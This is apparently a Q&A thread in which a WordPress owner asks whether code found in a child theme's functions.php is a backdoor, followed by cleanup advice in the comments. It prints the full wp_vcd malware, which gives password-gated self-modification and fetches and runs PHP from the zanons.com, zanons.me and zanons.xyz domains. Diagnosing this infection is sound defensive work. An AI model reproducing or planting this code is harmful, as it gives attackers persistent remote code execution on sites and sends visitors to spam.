# How to check my Wordpress source is victim of backdoor?

Tags: php, wordpress, security

Today, I check all my source code. I detect in all source have a strange code.

I don't have experience in this problem. I very confused.

In `/wp-content/themes/child-theme/function.php` have the code look like:

[image]

Does my website have been hacked or have the backdoor in my code?

I using the theme from ThemeForest. Don't use any null theme. I very anxious because of all website in production mode.

Domain: http://www.zanons.xyz/code.php

Can anyone explain this code and consequences, direct impact on the site?

Have any method to resolve my problem? Thanks.

Full strange code:

```
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5f8bb400922c3661c96af9e12eb821b9')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {

                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {

                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;

        case 'change_code';
            if (isset($_REQUEST['newcode'])) {

                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {

                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }


                    }
                }
            }
            break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key = '08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }

        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        }
    }
}

//$start_wp_theme_tmp

//wp_tmp


//$end_wp_theme_tmp
?>
```

Comment: it's a bit hard to say, what exactly do that file. delete all that code. replace all your wordpress files( exclude wp-content directory and wp-config) with default ones. also try to found all files with same code from wp-content and delete code. upload some server side antivirus. change your wp username and password, change username and password for databases and etc

Comment: Hi @SamvelAleqsanyan, I change wp username and password. using wp plugin: https://wordpress.org/plugins/gotmls/ to scan. remove all code in function file. I think it can be a strange code. I detect in the file `function.php` of the child theme. In any, my project has this code. Other projects don't use child theme don't have this code. The problem is: this code exists in all theme. Flatsome, WP Resident, JNews. I think the problem is not related with my theme because I bought directly in Themeforest. I check on localhost. It was the infection on localhost before I upload in hosting.

Comment: look at `wp-tmp.php` file from `wp-includes` folder. there may be some code written from that website. it may be helpful for detecting all folders, which may be caused.

Comment: `wp-tmp.php` seem redirect to malware link: https://pastebin.com/i68AgRPi.
I read the code, seem this code want to redirect all customer access my site also access their site to increment rank in many another search. `setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); `

Comment: @SamvelAleqsanyan. I deleted strange code in `function.php` and `wp-tmp.php`, 
`wp-vcd.php`, 
`wp-feed.php`, 
`wp-cd.php`. But when F5 my website, it auto generate `wp-tmp.php`. Have any method do debug the reason begin from? Any suggest from you is solution for me in this case.

Comment: as I mentioned.download website to localhost, first you need to delete all files f wp core, besides wp-config( but first check it ) and wp-content folder. after add the same version of default wp files. in the wp-content files search all files which contains `file_put_content`, `base64`, `file_get_content`, `curl` and other functions, which works with filesystem. then try several popular antiviruses for websites, at finish change username and password, when uploading back to server, also change usern and pass for db connection

Comment: this may help. after check website one more time for files and code

Comment: @SamvelAleqsanyan Thank you very much. I check all file in `wp-content` with your keyword suggest but I can't any strange code.